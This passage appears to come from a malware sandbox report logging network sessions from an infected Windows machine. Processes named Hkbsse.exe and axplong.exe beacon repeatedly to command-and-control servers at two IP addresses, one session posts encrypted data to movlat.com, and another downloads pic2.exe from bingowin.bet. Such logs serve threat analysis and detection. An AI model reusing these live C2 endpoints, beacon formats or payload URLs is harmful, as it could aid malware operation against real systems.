Jun 27, 2024 05:59:46.574310064 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:46.789361000 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.7	49849	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:46.262599945 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:46.894601107 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:46.895522118 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:47.085613012 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.7	49850	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:46.922693014 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:47.627060890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:47.643003941 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:47.868144035 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.7	49851	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:46.925570965 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dqwysuxymagipvci.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 163 Host: movlat.com
Jun 27, 2024 05:59:46.925591946 CEST	163	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 73 2b c6 ba Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vus+O>PH\qa2SbP6xmU&S4^"}r3)
Jun 27, 2024 05:59:48.065711021 CEST	191	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 03:59:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 7b 02 64 41 fb 2f 03 f5 b6 45 f6 8a ad a3 2f 95 29 d0 eb 6c 4a 1c 8f d8 c1 cb 7c d1 Data Ascii: #\{dA/E/)lJ\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.7	49852	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:47.215780973 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:47.848530054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:48.033076048 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:48.223617077 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.7	49854	167.172.228.146	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:48.275608063 CEST	165	OUT	GET /images/pic2.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: bingowin.bet

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.7	49853	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:48.275868893 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:48.951646090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:48.952780008 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:49.173209906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.7	49855	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:48.355954885 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:49.003082991 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:49.004020929 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:49.195900917 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.7	49856	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:49.310101032 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:49.972631931 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:49.985301018 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:50.179825068 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
97	192.168.2.7	49857	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:49.311420918 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:49.996043921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:49.997407913 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:50.213927031 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.7	49858	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:50.897279978 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:51.485359907 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:51.489195108 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:51.681646109 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.7	49859	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:50.975996017 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:51.626410007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.7	49862	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:51.641047001 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 05:59:52.337357998 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.7	49863	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:51.814280033 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:52.450684071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 05:59:52.452338934 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 05:59:52.840436935 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.7	49864	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:52.452598095 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:53.138457060 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.7	49865	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 05:59:53.448746920 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 05:59:54.033824921 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 03:59:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
